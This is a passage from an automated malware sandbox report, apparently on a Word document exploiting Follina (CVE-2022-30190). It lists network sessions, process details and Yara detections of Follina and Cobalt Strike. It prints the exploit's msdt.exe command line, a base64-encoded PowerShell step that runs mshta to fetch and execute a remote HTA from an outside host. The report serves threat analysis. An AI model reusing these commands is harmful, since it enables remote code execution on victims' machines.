                                                                                                                                              Jun 16, 2022 14:20:08.362894058 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.362912893 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.363102913 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.365233898 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.406281948 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.596543074 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.642559052 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.642770052 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.643004894 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.870064974 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.870100975 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.870124102 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:08.870325089 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.870409966 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:08.904798985 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.125413895 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.125642061 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.125781059 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.343839884 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.344546080 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.344568968 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.344683886 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.345591068 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.364561081 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.565346956 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.595829964 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.595948935 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.596090078 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.820771933 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.821291924 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.821315050 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:09.821413994 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.821537971 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:09.832215071 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:10.060343027 CEST6256349755101.33.231.81192.168.2.3
                                                                                                                                              Jun 16, 2022 14:20:10.060432911 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:10.060765028 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                              Jun 16, 2022 14:20:10.292787075 CEST6256349755101.33.231.81192.168.2.3
                                                                                                                                              • 101.33.231.81:62563
                                                                                                                                              • 159.75.135.162:61256
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.349746101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:02.135394096 CEST1293OUTOPTIONS / HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Authorization: Bearer
                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                              X-MSGETWEBURL: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Jun 16, 2022 14:20:02.359416008 CEST1293INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:02 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html;charset=utf-8
                                                                                                                                              Content-Length: 500


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              1192.168.2.349747101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:02.686994076 CEST1294OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Authorization: Bearer
                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Jun 16, 2022 14:20:02.905064106 CEST1295INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:02 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              10192.168.2.349756101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:10.625039101 CEST1312OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                              Authorization: Bearer
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:20:10.853050947 CEST1313INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:10 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              11192.168.2.349757101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:11.883615017 CEST1314OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                              Authorization: Bearer
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:20:12.109253883 CEST1314INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:11 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              12192.168.2.349758101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:19.800246954 CEST1315OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                              Authorization: Bearer
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:20:20.026706934 CEST1315INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:19 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              13192.168.2.349781159.75.135.16261256C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:21:44.362382889 CEST7317OUTGET /dllhost.hta HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              Accept-Language: en-US
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                              Host: 159.75.135.162:61256
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:21:44.602528095 CEST7317INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:21:44 GMT
                                                                                                                                              Content-type: application/octet-stream
                                                                                                                                              Content-Length: 21824
                                                                                                                                              Last-Modified: Mon, 13 Jun 2022 15:06:36 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              2192.168.2.349748101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:06.190567017 CEST1296OUTOPTIONS / HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Authorization: Bearer
                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                              X-MSGETWEBURL: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Jun 16, 2022 14:20:06.419333935 CEST1296INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:06 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html;charset=utf-8
                                                                                                                                              Content-Length: 500


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              3192.168.2.349749101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:06.751089096 CEST1298OUTGET /exploit.html HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:20:06.982336998 CEST1299INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:06 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              4192.168.2.349750101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:07.395937920 CEST1305OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                              Authorization: Bearer
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:20:07.629883051 CEST1306INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:07 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              5192.168.2.349751101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:08.133632898 CEST1306OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                              Authorization: Bearer
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              User-Agent: Microsoft Office Existence Discovery
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:20:08.362894058 CEST1307INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:08 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              6192.168.2.349752101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:08.643004894 CEST1307OUTOPTIONS / HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Authorization: Bearer
                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                              X-MSGETWEBURL: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Jun 16, 2022 14:20:08.870100975 CEST1308INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:08 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html;charset=utf-8
                                                                                                                                              Content-Length: 500


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              7192.168.2.349753101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:09.125781059 CEST1309OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Authorization: Bearer
                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Jun 16, 2022 14:20:09.344546080 CEST1309INHTTP/1.0 200 OK
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:09 GMT
                                                                                                                                              Content-type: text/html
                                                                                                                                              Content-Length: 5737
                                                                                                                                              Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              8192.168.2.349754101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:09.596090078 CEST1310OUTOPTIONS / HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Authorization: Bearer
                                                                                                                                              User-Agent: Microsoft Office Word 2014
                                                                                                                                              X-Office-Major-Version: 16
                                                                                                                                              X-MS-CookieUri-Requested: t
                                                                                                                                              X-FeatureVersion: 1
                                                                                                                                              X-MSGETWEBURL: t
                                                                                                                                              X-IDCRL_ACCEPTED: t
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              Jun 16, 2022 14:20:09.821291924 CEST1310INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:09 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: text/html;charset=utf-8
                                                                                                                                              Content-Length: 500


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              9192.168.2.349755101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jun 16, 2022 14:20:10.060765028 CEST1311OUTGET /exploit.html HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Host: 101.33.231.81:62563
                                                                                                                                              If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Jun 16, 2022 14:20:10.292975903 CEST1312INHTTP/1.0 304 Not Modified
                                                                                                                                              Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                              Date: Thu, 16 Jun 2022 12:20:10 GMT


                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:14:19:55
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                              Imagebase:0xbb0000
                                                                                                                                              File size:1937688 bytes
                                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:14:20:01
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                              Imagebase:0x8d0000
                                                                                                                                              File size:466688 bytes
                                                                                                                                              MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:14:20:14
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                              Imagebase:0x1180000
                                                                                                                                              File size:1508352 bytes
                                                                                                                                              MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                              • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.556829484.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:14:20:43
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
                                                                                                                                              Imagebase:0x140000
                                                                                                                                              File size:2170976 bytes
                                                                                                                                              MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:19
                                                                                                                                              Start time:14:20:45
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
                                                                                                                                              Imagebase:0xc60000
                                                                                                                                              File size:43176 bytes
                                                                                                                                              MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:20
                                                                                                                                              Start time:14:21:20
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
                                                                                                                                              Imagebase:0x140000
                                                                                                                                              File size:2170976 bytes
                                                                                                                                              MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:14:21:28
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
                                                                                                                                              Imagebase:0xc60000
                                                                                                                                              File size:43176 bytes
                                                                                                                                              MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:25
                                                                                                                                              Start time:14:21:41
                                                                                                                                              Start date:16/06/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta
                                                                                                                                              Imagebase:0xd30000
                                                                                                                                              File size:13312 bytes
                                                                                                                                              MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506676110.000000000626D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499865318.0000000006E54000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.498703501.000000000583F000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500021102.0000000006E34000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500164196.0000000006E17000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509313999.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499436698.0000000006E9B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500090549.0000000006E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
